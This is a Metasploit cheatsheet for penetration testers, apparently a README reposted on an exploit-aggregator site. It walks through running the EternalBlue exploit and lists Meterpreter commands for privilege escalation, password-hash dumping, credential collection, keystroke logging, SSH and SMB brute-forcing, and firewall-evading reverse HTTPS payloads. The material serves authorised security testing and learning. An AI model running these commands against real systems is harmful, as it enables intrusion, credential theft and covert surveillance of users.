Exploit for metasploit-cheatsheet

Name: Exploit for metasploit-cheatsheet
Rating: 5 (55 reviews)
2026-06-13 | CVSS 5.7
## https://sploitus.com/exploit?id=9A5FD168-FC71-5513-9CDE-518F25F86CEB
# Metasploit Cheatsheet

A practical reference for using Metasploit. Split into two parts — one for people just starting out, and one for those who already know the basics and want to go deeper.

No theory. No fluff. Just commands that work.

---

## Table of Contents

- [Beginner Guide](#beginner-guide)
  - [What is Metasploit?](#what-is-metasploit)
  - [Starting Metasploit](#starting-metasploit)
  - [Your First 5 Commands](#your-first-5-commands)
  - [Understanding Module Options](#understanding-module-options)
  - [Basic Workflow](#basic-workflow)
- [Pro Reference](#pro-reference)
  - [Session Management](#session-management)
  - [Meterpreter Commands](#meterpreter-commands)
  - [Useful Auxiliary Modules](#useful-auxiliary-modules)
  - [Advanced Tips](#advanced-tips)
- [Legal Notice](#legal-notice)

---

## Beginner Guide

### What is Metasploit?

Metasploit is a penetration testing framework. It gives you a set of tools to find and test vulnerabilities in systems — the same way an attacker would, but in a controlled and authorized way.

You run it on Kali Linux (or any Linux machine). Everything happens inside a terminal.

---

### Starting Metasploit

Open your terminal and type:

```bash
msfconsole
```

That's it. It will load up and show you a prompt like this:

```
msf6 >
```

This is where you type all your commands.

> **Tip:** Before you start, run `msfdb init` once to set up the database. It helps Metasploit store scan results so you can reference them later.

---

### Your First 5 Commands

These are the only commands you need to know at the start.

**1. Search for a module**

```bash
search 
```

Example — searching for an SMB vulnerability:

```bash
search eternalblue
```

This shows you a list of matching modules. Each one has a name, rank, and description.

---

**2. Select a module**

```bash
use 
```

Example:

```bash
use exploit/windows/smb/ms17_010_eternalblue
```

Once you do this, your prompt changes to show the module name. That means it's selected.

---

**3. See what the module needs**

```bash
show options
```

This shows all the settings the module requires. Anything marked `yes` under `Required` must be filled in before you can run the exploit.

---

**4. Set a value**

```bash
set  
```

The two most common things you'll set are the target IP and your own IP:

```bash
set RHOST 192.168.1.10
set LHOST 192.168.1.5
```

- **RHOST** = the target machine's IP address
- **LHOST** = your own machine's IP address

---

**5. Run the exploit**

```bash
exploit
```

Or use `run` — both do the same thing.

---

### Understanding Module Options

When you run `show options`, you'll see a table. Here is what each column means:

| Option | What it is |
| --- | --- |
| `LHOST` | Your IP address (your Kali machine) |
| `LPORT` | Your port (where the connection comes back to you) |
| `RHOST` | The target's IP address |
| `RPORT` | The target's port (usually pre-filled) |
| `PAYLOAD` | The code that runs on the target after the exploit works |

Most of the time you only need to set `RHOST` and `LHOST`. The rest is usually pre-filled.

---

### Basic Workflow

Follow these steps every time:

```
1.  msfconsole                         Start Metasploit
2.  search                       Find the right module
3.  use                   Select it
4.  show options                       See what needs to be set
5.  set RHOST               Set the target
6.  set LHOST                 Set your machine
7.  set PAYLOAD               Set payload if needed
8.  exploit                            Run it
```

---

## Pro Reference

### Session Management

When an exploit works, Metasploit opens a **session** — a connection to the target machine. You can manage multiple sessions at once.

| Command | What it does |
| --- | --- |
| `sessions` | List all active sessions |
| `sessions -i ` | Connect to a session by its ID |
| `sessions -k ` | Kill a specific session |
| `sessions -K` | Kill all sessions |
| `background` | Send current session to background |
| `sessions -u ` | Upgrade a shell session to Meterpreter |

---

### Meterpreter Commands

Meterpreter is an advanced shell that runs in memory on the target. It gives you a lot more control than a basic shell.

**System Info**

| Command | What it does |
| --- | --- |
| `sysinfo` | OS, hostname, architecture of target |
| `getuid` | Current user you are running as |
| `getpid` | Process ID of your Meterpreter session |
| `ps` | List all running processes |

**Privilege Escalation**

| Command | What it does |
| --- | --- |
| `getsystem` | Try to escalate to SYSTEM/root |
| `migrate ` | Move into another process (more stable, higher privs) |

> Use `migrate` to move into a process like `explorer.exe` or `lsass.exe` after escalation for stability.

**File Operations**

| Command | What it does |
| --- | --- |
| `pwd` | Show current directory on target |
| `ls` | List files in current directory |
| `cd ` | Change directory |
| `upload ` | Upload a file to the target |
| `download ` | Download a file from the target |
| `search -f ` | Search for a file on the target |

**Credential Gathering**

| Command | What it does |
| --- | --- |
| `hashdump` | Dump NTLM password hashes (Windows) |
| `run post/multi/recon/local_exploit_suggester` | Find local privilege escalation paths |
| `run post/windows/gather/credentials/credential_collector` | Collect stored credentials |

**Other Useful Commands**

| Command | What it does |
| --- | --- |
| `shell` | Drop into a native system shell |
| `screenshot` | Take a screenshot of the target's screen |
| `keyscan_start` | Start logging keystrokes |
| `keyscan_dump` | Dump captured keystrokes |
| `keyscan_stop` | Stop keylogger |

---

### Useful Auxiliary Modules

Auxiliary modules do not exploit anything. They are used for scanning and recon.

**Port Scanning**

```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445,3389
run
```

**SMB**

```bash
# Detect SMB version
use auxiliary/scanner/smb/smb_version

# Check for MS17-010 (EternalBlue) without exploiting
use auxiliary/scanner/smb/smb_ms17_010

# Brute force SMB login
use auxiliary/scanner/smb/smb_login
```

**SSH**

```bash
# Detect SSH version
use auxiliary/scanner/ssh/ssh_version

# Brute force SSH login
use auxiliary/scanner/ssh/ssh_login
```

**HTTP**

```bash
# Detect web server version
use auxiliary/scanner/http/http_version

# Directory brute force
use auxiliary/scanner/http/dir_scanner
```

---

### Advanced Tips

**Set multiple hosts at once**

```bash
set RHOSTS 192.168.1.1-254
set RHOSTS 192.168.1.0/24
```

**Use a payload that works through firewalls**

```bash
set PAYLOAD windows/meterpreter/reverse_https
```

HTTPS payloads blend into normal traffic and are less likely to be blocked.

**Save your session work to the database**

```bash
db_nmap -sV 192.168.1.0/24
```

This runs nmap and saves everything — open ports, services, versions — directly into the Metasploit database for later reference.

**Search by CVE**

```bash
search cve:2021-44228
```

**Check if a target is vulnerable before exploiting**

```bash
check
```

Not all modules support this, but when they do, use it first — it avoids unnecessary noise on the target.

**Reload all modules after adding new ones**

```bash
reload_all
```

---

## Legal Notice

Only use Metasploit on systems you own or have **written permission** to test.

Running exploits against systems without permission is illegal in most countries, including under the Computer Fraud and Abuse Act (USA), the Computer Misuse Act (UK), and similar laws elsewhere.

This repo is for learning and authorized testing only.

---

## Contributing

If something is wrong or outdated, open an issue or submit a pull request. Keep it practical — only add things that are actually useful in real engagements.